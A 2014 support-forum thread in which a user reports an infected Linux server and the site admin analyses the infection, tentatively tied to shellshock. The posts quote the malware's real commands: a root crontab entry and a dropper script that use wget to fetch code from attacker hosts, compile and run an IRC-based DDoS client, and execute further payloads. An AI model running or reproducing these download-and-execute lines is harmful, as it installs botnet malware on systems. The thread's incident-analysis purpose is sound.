Log inUsernamePassword
Log me on automatically each visit    
Register
Register
Log in to check your private messages
Log in to check your private messages
SMS Forum Index » Bugs

Post new topic   Reply to topic
Stablehost vulnerability! Goto page 1, 2  Next
View previous topic :: View next topic  
Author Message
keopp
Senior Member


Joined: 08 Nov 2008
Posts: 166
Location: Romania

PostPosted: Wed Oct 22, 2014 8:10 am    Post subject: Stablehost vulnerability! Reply with quote

Hi all.
I think I was infected.
The service crond is not working - this is how I found out,
and the content of /var/spool/cron/crontabs/root is as follows:

Code:

crontab 2.3.3
crontab file <opts>  replace crontab from file
crontab -    <opts>  replace crontab from stdin
crontab -u user      specify user
crontab -l [user]    list crontab for user
crontab -e [user]    edit crontab for user
crontab -d [user]    delete crontab for user
crontab -c dir       specify crontab directory
@weekly wget -q http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm /tmp/sh >/dev/null 2>&1


I found only this link telling something about this.

Do I have to reinstall?
Back to top
View user's profile Send private message
gerasimos_h
Site Admin


Joined: 09 Aug 2007
Posts: 1757
Location: Greece

PostPosted: Wed Oct 22, 2014 9:54 am    Post subject: Reply with quote

You are infected alright, although I wouldn't call this a bug though...

First thing is to try to look from where you were infected, so even if you reinstall you wouldn't infected again...

Looking at the script, you can see the source and what it infects, althoug this is a straight forward description at top of the a.c file
Code:
 This is a IRC based distributed denial of service client.

Code:
wget http://205.237.100.170/manual/a.c -O /tmp/init.c;
gcc -o /tmp/init /tmp/init.c;
chmod +x /tmp/init;
/tmp/init;
rm -rf /tmp/init /tmp/init.c;

wget http://205.237.100.170/manual/pb -O /tmp/p;perl /tmp/p;rm -rf /tmp/p;

wget http://205.237.100.170/manual/b -O /tmp/b;chmod +x /tmp/b;/tmp/b;rm -rf /tmp/b;


So do you have an idea how you could be exposed?
For instance if your root password is the same as an email address or service you use, or your clients you use to connect maybe they have a keylogger?

I'm downloading sources to take a look of them...

gerasimos_h

_________________
Superb! Mini Server Project Manager
http://sms.it-ccs.com
Back to top
View user's profile Send private message Visit poster's website
keopp
Senior Member


Joined: 08 Nov 2008
Posts: 166
Location: Romania

PostPosted: Wed Oct 22, 2014 10:32 am    Post subject: Reply with quote

Hi,
You're right it is not at all a bug, but I put it here since it is the most recent topic about vulnerabilities.

Well I have actually 2 machines affected. I am the only root user and there are not other users. I can't imagine what was happened, I suspect something regarding the DNS(bind) service because on one machine even it shows bind is working, it can't be accessed from exterior by pinging domain.name.

I can let you inspect the machines... since I am confident in you.
Back to top
View user's profile Send private message
gerasimos_h
Site Admin


Joined: 09 Aug 2007
Posts: 1757
Location: Greece

PostPosted: Wed Oct 22, 2014 10:39 am    Post subject: Reply with quote

I would like to take a look, if you don't mind...

Googling it they match those attacks with shellshock, so might be an app you use that has shell access?
You can send me a temporary password via email, to be more secure...

gerasimos_h

_________________
Superb! Mini Server Project Manager
http://sms.it-ccs.com
Back to top
View user's profile Send private message Visit poster's website
keopp
Senior Member


Joined: 08 Nov 2008
Posts: 166
Location: Romania

PostPosted: Wed Oct 22, 2014 10:59 am    Post subject: Reply with quote

Sent by PM (probabbly twice by mistake...)
Back to top
View user's profile Send private message
keopp
Senior Member


Joined: 08 Nov 2008
Posts: 166
Location: Romania

PostPosted: Wed Oct 22, 2014 11:02 am    Post subject: Reply with quote

Oh... I forgot, I must say that I deleted 2 weird executable files in /tmp, and also delete some files in /var/www/cgi-bin. Those from cgi, I kept them
Back to top
View user's profile Send private message
gerasimos_h
Site Admin


Joined: 09 Aug 2007
Posts: 1757
Location: Greece

PostPosted: Wed Oct 22, 2014 11:02 am    Post subject: Reply with quote

Are you sure you sent it to me, because I didn't get any...

gerasimos_h

_________________
Superb! Mini Server Project Manager
http://sms.it-ccs.com
Back to top
View user's profile Send private message Visit poster's website
keopp
Senior Member


Joined: 08 Nov 2008
Posts: 166
Location: Romania

PostPosted: Wed Oct 22, 2014 11:03 am    Post subject: Reply with quote

Yes, sure, by PM.
Back to top
View user's profile Send private message
gerasimos_h
Site Admin


Joined: 09 Aug 2007
Posts: 1757
Location: Greece

PostPosted: Wed Oct 22, 2014 11:09 am    Post subject: Reply with quote

OK! My bad, my inbox was 100% full, so can you please sent it again...

gerasimos_h

_________________
Superb! Mini Server Project Manager
http://sms.it-ccs.com
Back to top
View user's profile Send private message Visit poster's website
keopp
Senior Member


Joined: 08 Nov 2008
Posts: 166
Location: Romania

PostPosted: Wed Oct 22, 2014 11:11 am    Post subject: Reply with quote

Sent now.
Back to top
View user's profile Send private message
keopp
Senior Member


Joined: 08 Nov 2008
Posts: 166
Location: Romania

PostPosted: Wed Oct 22, 2014 11:15 am    Post subject: Reply with quote

I can confirm the bind service was affected(despite it shows it is running). I switched to another DNS server(the other infected machine) and now the domain can be pinged.
Back to top
View user's profile Send private message
gerasimos_h
Site Admin


Joined: 09 Aug 2007
Posts: 1757
Location: Greece

PostPosted: Wed Oct 22, 2014 11:21 am    Post subject: Reply with quote

I sent you a pm, did you got it...

gerasimos_h

_________________
Superb! Mini Server Project Manager
http://sms.it-ccs.com
Back to top
View user's profile Send private message Visit poster's website
keopp
Senior Member


Joined: 08 Nov 2008
Posts: 166
Location: Romania

PostPosted: Wed Oct 22, 2014 11:23 am    Post subject: Reply with quote

Yes I received and give response 1 min ago.
Back to top
View user's profile Send private message
keopp
Senior Member


Joined: 08 Nov 2008
Posts: 166
Location: Romania

PostPosted: Wed Oct 22, 2014 11:27 am    Post subject: Reply with quote

Send me a test message to tudorsps at gmail dot com. I'll use the sender adress to give you details.
Back to top
View user's profile Send private message
gerasimos_h
Site Admin


Joined: 09 Aug 2007
Posts: 1757
Location: Greece

PostPosted: Wed Oct 22, 2014 11:32 am    Post subject: Reply with quote

OK...

gerasimos_h

_________________
Superb! Mini Server Project Manager
http://sms.it-ccs.com
Back to top
View user's profile Send private message Visit poster's website
Display posts from previous:   
Post new topic   Reply to topic    SMS Forum Index » Bugs All times are GMT + 2 Hours
Goto page 1, 2  Next
Page 1 of 2

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum

SMS - Superb! Mini Server Project © 2016
Powered by phpBB © 2001, 2002 phpBB Group
iCGstation v1.0 Template By Ray © 2003, 2004 iOptional